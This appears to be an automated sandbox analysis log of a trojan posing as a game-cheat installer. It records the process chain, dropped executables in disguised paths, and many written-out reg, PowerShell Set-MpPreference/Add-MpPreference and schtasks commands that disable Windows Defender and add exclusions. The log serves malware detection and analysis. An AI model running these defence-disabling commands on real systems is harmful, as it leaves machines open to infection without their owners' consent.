Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Uses 32bit PE files

Source: JWQgbclQK5

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

Source: classification engine

Classification label: mal100.troj.evad.win@261/1107@1/11

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\OpenSource

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe

File created: C:\Users\user\AppData\Roaming\OpenSource

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4064:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Mutant created: \Sessions\1\BaseNamedObjects\Vvouaqo
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Uhivhcyle

Source: C:\Users\user\Desktop\JWQgbclQK5.exe

File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\progressgood.bat" "

Source: JWQgbclQK5

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\JWQgbclQK5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: JWQgbclQK5

ReversingLabs: Detection: 69%

Source: C:\Users\user\Desktop\JWQgbclQK5.exe

File read: C:\Users\user\Desktop\JWQgbclQK5.exe

Source: unknown	Process created: C:\Users\user\Desktop\JWQgbclQK5.exe "C:\Users\user\Desktop\JWQgbclQK5.exe"
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe .\Install_YTTCHTs.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E0A36685E052AA6AB614A5D414986D64 C
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1711662176 " ALLUSERS="1"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\progressgood.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5A985AC032B9C93F6690101D7D0915B7 E Global\MSI0000
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe .\Install_YTTCHTs.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Installer\MSI551D.tmp	Process created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1711662176 " ALLUSERS="1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E0A36685E052AA6AB614A5D414986D64 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5A985AC032B9C93F6690101D7D0915B7 E Global\MSI0000
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBF81.tmp "C:\Windows\Installer\MSIBF81.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBF92.tmp "C:\Windows\Installer\MSIBF92.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBFC2.tmp "C:\Windows\Installer\MSIBFC2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\Installer\MSIBFC2.tmp	Process created: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI551D.tmp "C:\Windows\Installer\MSI551D.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBF81.tmp "C:\Windows\Installer\MSIBF81.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBF92.tmp "C:\Windows\Installer\MSIBF92.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIBFC2.tmp "C:\Windows\Installer\MSIBFC2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
